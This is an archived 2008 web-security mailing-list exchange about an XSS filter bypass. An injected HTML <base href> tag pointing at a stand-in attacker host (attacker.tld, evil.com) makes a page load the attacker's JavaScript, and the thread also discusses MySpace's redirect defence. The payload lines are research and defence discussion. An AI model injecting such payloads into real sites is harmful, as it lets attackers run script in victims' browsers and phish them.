[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [WEB SECURITY] Nice little XSS trick

From: "Arshan Dabirsiaghi" <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
Subject: Re: [WEB SECURITY] Nice little XSS trick
Date: Wed, 16 Jul 2008 09:52:45 -0400
------_=_NextPart_001_01C8E74B.3A0044DE
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

http://i8jesus.com/?p=3D10 (Jan 2008)


I also presented this vector last year at OWASP San Jose when I demo'ed
AntiSamy as an example of dangerous content that isn't malicious code on
its own. That's one of the selling points of AntiSamy - it stops not
only XSS (well, we hope) but also prevents phishing attacks that abuse
HTML/CSS.

=20

I talked about it with RSnake afterwards and he had some crazy reason
for not putting it on his cheatsheet - claimed it was too much like the
<base href=3D"javascript:foo();//"> vector. As noted on my blog post, =
IE7
is longer (according to policy) supposed to be honoring <base> tags
outside of <HEAD>, but FF is still vulnerable. You could use this to
hijack anything - stylesheets (more XSS/phishing), images, scripts, etc.
The only thing <base> won't help you steal as far as resources is
anything gathered in JavaScript.=20

=20

I think some of the big players had this figured out already (or more
likely, just got really lucky). MySpace takes <base href> values, base64
encodes them, and redirects them through another domain. The flow is
like this for them:

=20

1.       User puts in <base href=3D"http://evil.com";>

2.       Str =3D base64("http://evil.com";)

3.       Profile =3D <base
href=3D"http://msplinks.com/redir?<base64encodedStr>

=20

Maybe there's a way to abuse that, but I don't think so. And eBay
doesn't have any relative links after user content, at least when I
first looked at this last year. They probably both just got lucky. =3D]

=20

Arshan

=20

---------- Previous message ----------

From: Amit Klein <aksecurity@gmail.com>

Date: Tue, Jul 15, 2008 at 7:33 AM

Subject: [WEB SECURITY] Nice little XSS trick

To: Web Security <websecurity@webappsec.org>

=20

=20

Hi list

=20

Recently I've been thinking about bypassing anti-XSS filters, and a nice
little trick occurred to me, which I haven't seen anywhere (e.g. it's
not on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does
mention BASe, but not the trick I describe here). The idea is to use the
HTML BASE tag to force loading of JS code from the attacker's host.
Consider a page with XSS vulnerability such as:

=20

<html>

...

***XSS code may be embedded here***

...

<script src=3D"/foo/bar.js"></script>

...

</html>

=20

Now, an attacker can inject <base href=3D"http://www.attacker.tld/";>, =
and
next thing you know, the browser (IE, at least) loads the JS from
http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
"explicit" JS code involved in the payload itself.

=20

Note that according to the HTML standard, BASE should be placed in the
HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
This is indeed observed by FF 2, but not by IE (checked IE6).

=20

Thanks,

-Amit


------_=_NextPart_001_01C8E74B.3A0044DE
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html xmlns:v=3D"urn:schemas-microsoft-com:vml" =
xmlns:o=3D"urn:schemas-microsoft-com:office:office" =
xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml"; =
xmlns=3D"http://www.w3.org/TR/REC-html40";>

<head>
<meta http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dus-ascii">
<meta name=3DGenerator content=3D"Microsoft Word 12 (filtered medium)">
<style>
<!--
 /* Font Definitions */
 @font-face
	{font-family:"Cambria Math";
	panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
	{font-family:Calibri;
	panose-1:2 15 5 2 2 2 4 3 2 4;}
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0in;
	margin-bottom:.0001pt;
	font-size:11.0pt;
	font-family:"Calibri","sans-serif";}
a:link, span.MsoHyperlink
	{mso-style-priority:99;
	color:blue;
	text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
	{mso-style-priority:99;
	color:purple;
	text-decoration:underline;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
	{mso-style-priority:34;
	margin-top:0in;
	margin-right:0in;
	margin-bottom:0in;
	margin-left:.5in;
	margin-bottom:.0001pt;
	font-size:11.0pt;
	font-family:"Calibri","sans-serif";}
span.EmailStyle17
	{mso-style-type:personal-compose;
	font-family:"Calibri","sans-serif";
	color:windowtext;}
.MsoChpDefault
	{mso-style-type:export-only;}
@page Section1
	{size:8.5in 11.0in;
	margin:1.0in 1.0in 1.0in 1.0in;}
div.Section1
	{page:Section1;}
 /* List Definitions */
 @list l0
	{mso-list-id:981037742;
	mso-list-type:hybrid;
	mso-list-template-ids:1023987298 67698703 67698713 67698715 67698703 =
67698713 67698715 67698703 67698713 67698715;}
@list l0:level1
	{mso-level-tab-stop:none;
	mso-level-number-position:left;
	text-indent:-.25in;}
ol
	{margin-bottom:0in;}
ul
	{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 9]><xml>
 <o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
 <o:shapelayout v:ext=3D"edit">
  <o:idmap v:ext=3D"edit" data=3D"1" />
 </o:shapelayout></xml><![endif]-->
</head>

<body lang=3DEN-US link=3Dblue vlink=3Dpurple>

<div class=3DSection1>

<p class=3DMsoNormal><a =
href=3D"http://i8jesus.com/?p=3D10";>http://i8jesus.com/?p=3D10</a>
(Jan 2008)<o:p></o:p></p>

<p class=3DMsoNormal><br>
I also presented this vector last year at OWASP San Jose when I =
demo&#8217;ed
AntiSamy as an example of dangerous content that isn&#8217;t malicious =
code on
its own. That&#8217;s one of the selling points of AntiSamy &#8211; it =
stops
not only XSS (well, we hope) but also prevents phishing attacks that =
abuse
HTML/CSS.<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>I talked about it with RSnake afterwards and he had =
some
crazy reason for not putting it on his cheatsheet &#8211; claimed it was =
too much
like the &lt;base href=3D&#8221;javascript:foo();//&#8221;&gt; vector. =
As noted
on my blog post, IE7 is longer (according to policy) supposed to be =
honoring
&lt;base&gt; tags outside of &lt;HEAD&gt;, but FF is still vulnerable. =
You
could use this to hijack anything &#8211; stylesheets (more =
XSS/phishing),
images, scripts, etc. The only thing &lt;base&gt; won&#8217;t help you =
steal as
far as resources is anything gathered in JavaScript. <o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>I think some of the big players had this figured =
out already
(or more likely, just got really lucky). MySpace takes &lt;base href&gt; =
values,
base64 encodes them, and redirects them through another domain. The flow =
is
like this for them:<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoListParagraph style=3D'text-indent:-.25in;mso-list:l0 =
level1 lfo1'><![if !supportLists]><span
style=3D'mso-list:Ignore'>1.<span style=3D'font:7.0pt "Times New =
Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span><![endif]>User puts in &lt;base =
href=3D&#8221;http://evil.com&#8221;&gt;<o:p></o:p></p>

<p class=3DMsoListParagraph style=3D'text-indent:-.25in;mso-list:l0 =
level1 lfo1'><![if !supportLists]><span
style=3D'mso-list:Ignore'>2.<span style=3D'font:7.0pt "Times New =
Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span><![endif]>Str =3D =
base64(&#8220;http://evil.com&#8221;)<o:p></o:p></p>

<p class=3DMsoListParagraph style=3D'text-indent:-.25in;mso-list:l0 =
level1 lfo1'><![if !supportLists]><span
style=3D'mso-list:Ignore'>3.<span style=3D'font:7.0pt "Times New =
Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span><![endif]>Profile =3D &lt;base =
href=3D&#8221;http://msplinks.com/redir?&lt;base64encodedStr&gt;<o:p></o:=
p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>Maybe there&#8217;s a way to abuse that, but I =
don&#8217;t
think so. And eBay doesn&#8217;t have any relative links after user =
content, at
least when I first looked at this last year. They probably both just got =
lucky.
=3D]<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>Arshan<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>---------- Previous message =
----------<o:p></o:p></p>

<p class=3DMsoNormal>From: Amit Klein =
&lt;aksecurity@gmail.com&gt;<o:p></o:p></p>

<p class=3DMsoNormal>Date: Tue, Jul 15, 2008 at 7:33 AM<o:p></o:p></p>

<p class=3DMsoNormal>Subject: [WEB SECURITY] Nice little XSS =
trick<o:p></o:p></p>

<p class=3DMsoNormal>To: Web Security =
&lt;websecurity@webappsec.org&gt;<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>Hi list<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>Recently I've been thinking about bypassing =
anti-XSS
filters, and a nice little trick occurred to me, which I haven't seen =
anywhere
(e.g. it's not on RSnake's XSS cheat sheet - =
http://ha.ckers.org/xss.html; it
does mention BASe, but not the trick I describe here). The idea is to =
use the
HTML BASE tag to force loading of JS code from the attacker's host. =
Consider a
page with XSS vulnerability such as:<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>&lt;html&gt;<o:p></o:p></p>

<p class=3DMsoNormal>...<o:p></o:p></p>

<p class=3DMsoNormal>***XSS code may be embedded here***<o:p></o:p></p>

<p class=3DMsoNormal>...<o:p></o:p></p>

<p class=3DMsoNormal>&lt;script =
src=3D&quot;/foo/bar.js&quot;&gt;&lt;/script&gt;<o:p></o:p></p>

<p class=3DMsoNormal>...<o:p></o:p></p>

<p class=3DMsoNormal>&lt;/html&gt;<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>Now, an attacker can inject &lt;base
href=3D&quot;http://www.attacker.tld/&quot;&gt;, and next thing you =
know, the
browser (IE, at least) loads the JS from =
http://www.attacker.tld/foo/bar.js...
And the beauty is that there's no &quot;explicit&quot; JS code involved =
in the
payload itself.<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>Note that according to the HTML standard, BASE =
should be
placed in the HEAD section
(http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This is =
indeed
observed by FF 2, but not by IE (checked IE6).<o:p></o:p></p>

<p class=3DMsoNormal><o:p>&nbsp;</o:p></p>

<p class=3DMsoNormal>Thanks,<o:p></o:p></p>

<p class=3DMsoNormal>-Amit<o:p></o:p></p>

</div>

</body>

<!--[object_id=3D#aspectsecurity.com#]--></html>

------_=_NextPart_001_01C8E74B.3A0044DE--
Follow-Ups:
- Re: [WEB SECURITY] Nice little XSS trick
  - From: Amit Klein
- Re: [WEB SECURITY] Nice little XSS trick
  - From: Bill Pennington
Prev by Date: Re: [WEB SECURITY] Re: [Webappsec] Corsaire whitepaper: Breaking the Bank (Vulnerabilities in Numeric Processing within Financial Applications)
Next by Date: Re: [WEB SECURITY] Nice little XSS trick
Previous by thread: Re: [WEB SECURITY] Nice little XSS trick
Next by thread: Re: [WEB SECURITY] Nice little XSS trick
Index(es):
- Date
- Thread
Brought to you by http://www.webappsec.org
Search this site